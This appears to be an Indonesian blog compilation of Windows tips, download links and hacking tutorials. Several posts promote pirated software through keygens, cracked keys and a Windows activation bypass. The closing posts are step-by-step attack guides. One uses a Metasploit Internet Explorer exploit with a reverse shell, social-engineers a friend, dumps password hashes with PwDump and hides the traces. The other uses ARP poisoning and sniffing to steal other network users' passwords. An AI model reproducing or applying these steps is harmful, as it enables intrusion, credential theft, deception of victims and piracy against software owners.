Kembalikan Regedit, Folder Option, Run dll dengan RRT v1.0.4

Halo agan agan ini saya mau sharing software yang mantep nih. Ini software bisa mengaktifkan Regedit, Folder Option, Run, Firewall dll yang di-disable virus.

Portable ko jadi ringan banget kalo mau download. Yang mau download bisa klik :
http://www.ziddu.com/download/18021132/RRT.rar.html

Semoga bermanfaat gan :D

Tips-Trik. Mengembalikan Folder Option yang dihidden virus

Virus jaman sekarang ini makin ganas saja gan. Salah satu yang sering dilakukan sang virus adalah menghilangkan “Folder Option” di menu Tools pada Explorer anda, sehingga salah satu akibatnya anda tidak bisa merubah option untuk view/ show hidden file, hingga akhirnya anda tidak bisa mengakses folder yang anda hidden.

Nah ini saya ada cara untuk mengembalikan folder option yang dihidden virus gan. Langsung aja ya cekibroott :

1. Klik menu Start > Run

2. Ketik : gpedit.msc untuk membuka Group Policy Windows.

3. Masuk ke :User Configuration >Administrative Templates >Windows Component > Windows  Explorer.

4. Di Panel sebelah kanan, carilah “Remove the Folder Option menu item from the Tools Menu” kemudian double klik dan set value ke “Disabled”

5. Jika fungsi Regedit di komputer anda tidak berfungsi atau di-disable "Registry Editing has been disabled by your Administrator", agan agan bisa lihat tutorialnya diartikel sebelumnya. Klik 

Semoga bermanfaat gan :D

Tips-Trik. Mengaktifkan kembali fungsi Regedit yang di-disable virus

Regedit Disable by Administrator. Pasti agan agan sering dengar kata kata itu kan ? Nah ini bisa jadi regedit di-disableoleh pemilik komputer agar orang lain tidak mengotak atik settingan windows. Tapi bisa juga itu di-disable oleh virus gan. Ini saya ada cara agar regedit bisa dibuka lagi oleh kita.

Langsung aja ya cekibrott :

1. Klik Menu Start – RUN dan masukkan perintah : gpedit.msc

2. Akan muncul Windows Group Policy, selanjutnya pilih User Configuration – Administrative Templates – System.

3. Setelah itu pada jendela sebelah kanan (panel setting) Double Klik "Prevent Access to Registry Editing Tools".

4. Pada jendela yang muncul pilih Not Configured atau Disable,untuk mengaktifkan kembali fungsi regedit.

5. Klik OK

Sekarang coba agan akses registry editor lewat menu Run - Regedit kalau masih belum berhasil, Restart Komputer anda dan coba akses lagi registry editor.

Semoga Bermanfaat :D

Tips-Trik. Mengaktifkan kembali registry System Restore yang terinfeksi virus

Halo gan ini ada sedikit penjelasan tentang system restore. Jadi system restore adalah salah satu fitur dari Operating system windows yang berfungsi untuk mengembalikan kondisi system windows tersebut pada kondisi tanggal sebelumnya. Nah gimana nih kalo sampe si system restore sendiri terinfeksi virus ? ini saya mau sharing cara agar kita bisa mengaktifkan kembali registry system restore yang terinfeksi virus.

cekibrott :
1. Masuk ke Run ketikkan regedit lalu tekan enter sampai muncul form Registry.

2. Masuk ke ” HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore ” klik dua kali pada DisableSR rubah value datanya menjadi angka 0 sehingga menjadi 0×00000000(0) seperti pada gambar dibawah ini :

3. Restart komputer biar terjadi perubahan

4. Klik kanan pada My computer Klik properties

5. Klik tab System restore dan aktifkan lagi system restorenya

Semoga bermanfaat gan :D

Vipre 4.0.3 Premium

                                               

Halo gan udah pada tau kan antivirus sadis berlogo ular ini ? Yup viper antivirus ini masih sedikit yang pakai tapi dijamin deh aman banget buat yang suka ngenet.

Berikut ini keunggulan viper 4.0.3 Premium :

1. Ringan digunakan, dijamin ga akan ngeberatin pc.

2. Antivirus dengan Spyware dan Firewall. 

3. Teknologi terkini dengan anti-rootkit.

4. Proteksi Pro aktif pada setiap file. 

5. Proteksi Email.

6. Sangat direkomendasikan untuk Notebook.

7. Tersedia Update manual setiap harinya.

Setelah Install Vipre silakan aktivasi Vipre 4.0.3 Premium dengan cara :

1. Buka Vipre Antivirus.

2. Klik help, pilih registtration kemudian masukkan key "00000-00000-00000-00000-00000" tanpa tanda kutip ya, lanjut klik ok.

3. Setelah muncul jendela pop up registration jalankan keygennya, masukkan tahun kadaluwarsa nya lalu klik generate password.

4. Copy paste password yang dihasilkan oleh jendela pop up registration password tadi.

Buat yang mau download silahkan klik link dibawah ini gan :

http://www.4shared.com/get/TQq456TO/Vipre403Premium_wwwremo-xpcom.html

Semoga bermanfaat :D

Avast! Antivirus Pro 5.0.492 + Key

Halo gan ini saya mau sharing antivirus yang banyak dipake dan banyak juga kelebihannya gan. Dan saat ini avast dinobatkan (cielah) sebagai antivirus gratis terbaik dan banyak dipakai.

Nah banyak alasan mengapa banyak orang memilih Avast dan berikut ini alasan utama orang orang  banyak menggunakan Avast Antivirus:

• Instalasi yang sederhana dan tidak memakan waktu yang lama.
• Proses registrasi yang sederhana.
• Ada notifikasi jika ada virus yang terdeteksi.
• Bisa disesuaikan sampai level mana pendeteksian virus, apakah menggunakan low detection atau very secure. Semakin tinggi level semakin banyak memakan resource daru system komputer.
• Tidak merusak system Windows.

Nah gausah blablabla lagi. Buat yang mau download bisa klik :  http://www.4shared.com/rar/B78wKQtI/Avast_Antivirus_Pro_50492__key.htm

udah komplit sama serial numbernya gan. Semoga bermanfaat :D

Hidden file penting anda dengan password menggunakan Protected Folder

Hide manual ?  masih bisa dibuka pake folder option gan. Nah ini saya ada software yang bisa berguna untuk melindungi file agan biar ga kecolongan sama orang lain dan yang pasti aman gan. cekibroott

Cara kerja :

- Saat pertama diinstal, program akan meminta password untuk keamanan.

- Setelah diinstal, masukkan passwordnya.

- Klik tombol add untuk menambahkan file dan memproteksi file tersebut agar tidak dapat dibuka kecuali diunlock dulu. (Hiden file dengan aman)

- Unlock file ketika akan dibuka/dipakai.

- Bila program ini diclose, maka file program ini akan otomatis terkunci.

Note : Lock kembali file yang sudah di unlock agar data pribadi agan aman dan terkendali. hehe

Buat yang mau download bisa klik : http://www.ziddu.com/download/18000106/pf-setup-slim.rar.html

Ini Serial numbernya gan : http://www.ziddu.com/download/18000424/serialnumberPF01.rar.html

Semoga bermanfaat :D

Lindungi flashdisk anda dengan password menggunakan FDL 1.6

Flashdisk sangat berguna untuk kebutuhan sehari hari. Apalagi bagi kalangan pebisnis, flashdisk pasti sangat berguna untuk menyimpan file cadangan di laptop/komputer kita. Tapi barang kecil ini juga rawan virus dan gampang ilang gan. Jangan sampe deh file penting kita jatuh ketangan virus atau orang orang yang ga bertanggung jawab. Untuk itu saya ada software Flash Disk Lock versi 1.6 yang bisa mengunci flashdisk dengan password dan bisa mencegah virus virus lokal masuk. Nah ini ada cara cara menggunakan FDL 1.6. Langsung aja yaa cekibroott :

Cara menggunakan FDL 1.6 :

- Copykan ke flaskdisk yang akan dikunci (diluar folder).
- Jalankan aplikasi.
- Masukkan password.

Untuk menghindari dari virus gunakan autorun.inf

Caranya :
- Buka notepad.
- Ketik : [Autorun] Open=System.exe
-Simpan kodenya dengan nama Autorun.inf dan simpan kedalam Flash Disk.

Buat agan agan yang berminat bisa download programnya disini :  http://www.ziddu.com/download/17998469/FlashDiskLock1.6-mediasarap.blogspot.com.rar.html

Semoga bermanfaat gan :D

Portable Your Uninstaller 2008 Pro 6.1.12.32

Bila agan agan meng-uninstal software pasti aja suka ada junk file atau file sampah yang masih nempel di komputer dan jika dibiarkan akan menumpuk dan akan membuat komputer agan agan jadi berat. Nah ini saya ada software Your Uninstaller buat meng-uninstal sekaligus menghapus semua isi dari bawaan software tersebut. Biar lebih ringan, saya kasih portablenya aja ya gan. Nih tampilannya gan cekibrott :

SELESAI !!!

Buat yang mau ngedownload ini saya kasih linknya : http://www.4shared.com/rar/4NFNAJEV/Portable_Your_Uninstaller_2008.html

Semoga Bermanfaat gan :D

Sign up dan login php

Oke gan kali ini saya akan membahas tentang materi dasar web dinamis. Disini kita akan membuat fitur registrasi/sign up dan login dengan php mysql. cekibroott

1. Instal apache2triad dan dreamweaver (usul adobe dreamweaver cs3) terus buat databasenya. Contoh ada di file dump_signup.txt
2. Buka dan ketik ulang source code atau bisa copy paste dan cek koneksinya. mungkin untuk lebih jelas agan agan bisa pelajari sendiri source code yg saya kasih. 
3. Save semua file atau dalam satu folder atau bisa pindahkan semua yang sudah didownload sebelumnya ke Local Disk C -> Apache2triad -> htdocs
4. Agan agan bisa memanggil semua file tersebut dengan cara : Buka browser -> http://localhost/signup/ -> dan pilih nama folder yang agan save.
5. Agar lebih mudah lagi, rename file utama (misalnya login.php) menjadi index.php
6. Untuk source codenya bisa didownload disini http://www.ziddu.com/download/17996368/signup-login-global-off.zip.html

Semoga bermanfaat gan :D

Membersihkan File Sampah Dengan BleachBit Portable

Kapasitas hard disk yang kurang besar seringkali menjadi masalah bagi para pengguna komputer. Untuk membersihkan file yang tidak terpakai, seperti temporary files and lain sebagainya, para pengguna komputer dapat saja melakukannya secara manual. Namun, membersihkan hard disk dari file yang tidak diperlukan secara manual tentunya akan menghabiskan banyak waktu. Untuk melakukan semuanya dengan mudah, para pengguna komputer dapat menggunakan perangkat lunak BleachBit.

Perangkat lunak BleachBit membantu pengguna komputer untuk membersihkan file yang tidak diperlukan sehingga mereka dapat memanfaatkan kapasitas penyimpanan hard disk mereka secara maksimal. Perangkat lunak ini juga membantu para pengguna komputer dalam menjaga privasi mereka. BleachBit membersihkan cache, menghapus cookies, menghapus internet history, membuang file temporary, menghapus logs, dan membereskan file sampah lainnya. Perangkat lunak BleachBit dapat digunakan pada komputer yang memakai sistem operasi Windows dan Linux.

Perangkat lunak BleachBit mampu membersihkan file sampah yang dihasilkan oleh perangkat lunak lain seperti Internet Explorer, Firefox, Adobe Flash, Opera, Safari, Google Chrome, dan sebagainya. Namun, perangkat lunak ini tidak hanya menghapus file sampah secara sederhana saja. BleachBit juga menyediakan fitur shredding yang dapat digunakan untuk menghilangkan file secara permanen. Artinya, file yang dihapus dengan fitur file shreadding tadi tidak akan dapat dimunculkan lagi dengan perangkat lunak untuk file recovery. BleachBit dapat secara sempurna menghilangkan file yang pernah ada tanpa jejak sedikitpun, dan juga membersihkan file sampah dari perangkat lunak lain seperti Firefox untuk membantunya bekerja dengan lebih maksimal.

Untuk dapat menggunakan perangkat lunak BleachBit, para pengguna komputer tidak perlu mengeluarkan uang sepeser pun. BleachBit adalah perangkat lunak open source yang dapat digunakan secara gratis. Untuk mendownloadnya tinggal klik link dibawah ini :
http://www.ziddu.com/download/17986401/BleachBit-0.9.1-portable.zip.html

Semoga Bermanfaat :D

Cara agar windows 7 bajakan menjadi genuin/original

Mau windows 7 bajakan anda jadi original ? gampang. Disini saya akan mensharingkan cara agar windows 7 anda jadi genuin/original. langsung aja ya cekibrott
Cara pertama :

1. Download aplikasi Remove WAT ver. 2.2.6 disini :
http://www.ziddu.com/download/18706468/RemoveWAT.rar.html
2. Ekstrak filenya.
3. Tutup semua antivirus dan firewall, dan kemudian jalankan program. Koneksi internet tidak perlu dimatikan
4. Klik “Remove WAT” dan tunggu sampai muncul pesan berhasilnya prosedur.
5. Komputer akan restart secara otomatis.
6.  Jika pada desktop tidak ada lagi tulisan “Windows Is Not Genuine”, berarti proses berhasil.
7. Untuk lebih detail lagi klik kanan pada My Computer dan Klik Property. Jika berhasil maka ada keterangan kalau windows anda sudah genuin.

 
Fitur dari Remove WAT :

1. Tidak memerlukan proses tambahan setelah proses patching.
2. Secara teoritis memiliki tingkat keberhasilan 100%.
3. Pengkodean yang Efisien dengan pemeriksaan keamanan untuk mencegah kerusakan pada instalasi Windows.
4. Ada pilihan untuk Un-install.
5. Menghapus semua elemen yang berhubungan dengan keaslian yang tampak pada pengguna, menjaga sistem aktivasi inti tetap aktif, dan membantu anda melewati proses pengecekan keaslian tanpa masalah.
6. Ada Progress bar untuk memantau waktu penyelesaian.

Mau lebih gampang lagi ? ini ada cara kedua dan gausah repot kaya cara diatas.
Cara kedua : BELI WINDOWS ORIGINAL SUPAYA GENUIN DARI SANANYA.
hehehe just kiddink brad. Semoga bermanfaat ya :D

Browsing internet dengan cepat

Browsing Internet dengan kecepatan yang tinggi pasti sangat menyenangkan, berbagai cara dilakukan untuk mempercepat koneksi internet baik menggunakan software agar koneksi internet menjadi lebih cepat maupun menggunakan settingan tertentu yang diklaim bisa mempercepat koneksi internet.

Berikut ini adalah beberapa tips yang dapat digunakan untuk mempercepat koneksi internet :

A. Menggubah setting bandwith pada windows (Hanya kami uji pada Windows XP)

Pada dasarnya OS windows sudah membatasi bandwidth untuk koneksi internet sebanyak 20% dari total bandwidth yang seharusnya bisa maksimal, jika netter ingin menambah bandwidth internet supaya koneksinya terasa lebih cepat dan kencang bisa dengan cara mengurangi atau mengosongkan batasan bandwidth tersebut supaya pada Windows kita bisa maksimal dalam menggunakan bandwidth yang sudah ada.

Ikuti petunjuknya seperti dibawah ini :

1. Klik Start
2. Klik Run
3. Ketik gpedit.msc
4. Kemudian klik Ok
5. Setelah masuk klik (buka) Administrative Templates
6. Kemudian klik (buka) Network
7. Setelah terbuka klik QoS Packet scheduler
8. Kemudian klik Limit Reservable Bandwidth
9. Dan setelah terbuka ubah setting menjadi Enable
10. Kemudian ubah Bandwidth Limitnya menjadi 0
11. Klik Apply, dan terus Ok
12. Kemudian keluar dan Restart komputer

B. Pakai browser Google Chrome atau Apple Safari

Versi terbaru dari browser Chrome dan Safari sangatlah cepat bila dibandingkan dengan Firefox ataupun Internet Explorer (sudah dicoba dan terbukti memang jauh lebih cepat). Saran saya pakailah Google Chrome karena selain cepat, Chrome lebih aman dibanding dengan Safari, walau dalam beberapa hal Safari kadang lebih cepat dari Chrome.

Kalau netter sudah terbiasa memakai Firefox dan tidak ingin beralih ke browser lagi, bisa tambahkan Add-on “Adblock” untuk memblok iklan, gambar, dan flash yang aktif. Ada beberapa Add-on lagi dari Firefox seperti NoScript yang bisa mempercepat akses internet, tapi sayangnya kalau kebanyakan Add-on justru, kadang malah memperlambat akses dari browser Firefox sendiri.

C. Perbesar cache browser hingga 5% dari kapasitas Harddisk atau 1 – 2 GB

Cara ini terbukti efektif untuk mempercepat akses browser. Logikanya adalah browser tidak perlu tiap kali loading gambar dan tetek bengeknya segala setiap kali berkunjung ke situs yang sudah pernah dikunjungi, karena kalau situs sudah pernah dikunjungi akan otomatis di-cache oleh browser.

Cara ini hanya berlaku jika kapasitas harddisk netter cukup besar. Pada umumnya masing-masing browser ada yang bisa diset kapasitas cachenya, ada yang otomatis. Jika browser netter tidak ada pilihan set cache, artinya netter jangan sering-sering (atau tidak perlu) clear history di browser.

SELAMAT MENCOBA :D

Hack Mozilla firefox, meningkatkan kecepatan internet

Memang kalau cara hack tuh makin lama makin keren saja, banyak sekali yang bisa di hack mulai dari hack kartu kredit sampai ke hack sistem keamanan pentagonpun bisa di bobol hacker. Nah di sini saya tidak akan terlalu jauh bicara hack yang sulit sulit, di sini saya akan memberikan cara hack mozilla firefox untuk meningkatkan kecepatan internet anda biar jauh lebih cepat. 

Tips mempercepat kecepatan internet ini bukan hanya berlaku untuk komputer pribadi namun bisa juga untuk mempercepat kecepatan internet di warnet. Nah langsung aja deh, ini dia langkah langkah yang harus anda lakukan agar internet anda menjadi lebih cepat, ingat browser yang di gunakan adalah mozilla firefox.

Berikut ini adalah langkah langkahnya. cekibrott :

1. Buka Mozilla Firefox.

2. Ketikan di addres bar “about:config” (tanpa tanda patik).

3. Scroll mouse anda kebawah dan cari “network.http.max-connections“, double klik dan masukan nilai “64“.

4. Cari “network.http.max-connections-per-server“, double klik dan masukan nilai “21“

5. Cari ‘network.http.max-persistent-connections-per-server“, double klik dan masukan nilai “8“.

6. Doube klik pada “network.http.pipelining ” menjadi “true“.

7. Cari “network.http.pipelining.maxrequests“, double klik dan masukan nilai “100“.

8. Double klik pada “network.http.proxy.pipelining” menjadi “true“.

9. Langkah terakhir, klik kanan dimana saja pilih
New >> integrar >> lalu tulis “nglayout.initialpaint.delay” (tanpa tanda petik”. Kemudian masukan nilai “0“.

Rasakan kecepatan internetnya dan bandingkan dengan sebelumnya. tapi artikel ini tidak akan berfungski saat komputer anda terdeteksi malware atau worm yang menghambat koneksi internet anda.

Selamat Mencoba :DD

Hacking Windows XP SP2 di LAN

Setelah mengetahui sedikit dan konsep dasar ?standar? mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare (http://chaidir.wordpress.com/2006/11/14 ... vmware.com )untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework (http://chaidir.wordpress.com/2006/11/14 ... vmware.com ) untuk melakukan exploit serta PwDump6 (http://www.foofus.net/fizzgig/pwdump/ ) untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ?limited user? tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3 ( http://metasploit.com/projects/Framework/msf3/ ), kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin (http://www.cygwin.com/ ) untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ?mfsconsole?! 



Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ?help?.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution ( http://www.microsoft.com/technet/securi ... 6-055.mspx ). 

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah : 

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ?social engineering?, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ?bekerja?. Setelah beberapa saat bilang aja ?wah.. ada error nih. Ok deh.. saya coba betulin dulu? makasih ya?. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-?end process?-kan ?dumpred.exe? juga, tapi setelah exploit bekerja ).

Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan tampak seperti gambar berikut :





Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ?payload? yang digunakan adalah ?win32_reverse? dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ?exploit?, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus

Jika anda berhasil, maka anda akan mendapatkan ?cmd.exe? dari komputer target.

Crack da Password!

Nah, setelah kita ?menguasai? komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ?menyediakan? program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ?biasa?, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ?$? biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ?net use?. Contoh perintah yang digunakan :



Setelah itu copy Pwdump ke komputer target dalam folder sementara, ?temp?. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump ?o pass.txt 127.0.0.1

Klo berhasil akan tampak pada gambar berikut.



Lalu copy file pass.txt ke komputer kita 

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.



Nah, udah dapet hash file nya kan. Tinggal di crack aja deh?. (baca artikel sebelumnya buat nge-crack password). (http://chaidir.wordpress.com/2006/09/24 ... -passwords )

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ?menyenangkan? untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking?..

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!!

Cara Mudah Hacking di LAN (Local Area Network)

Cara hacking via LAN (untuk curi password orang orang yang lagi browsing)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

1. * Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
   * Buka program Cain anda
   * Klik pada bagian configure
   * Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
   * Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
   Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
   * Setelah itu apply settingannya dan klik ok
   * Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
   * Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
   * Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
   * Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
   * Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
   * Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
   * Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
   * Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
   * Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
   * Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)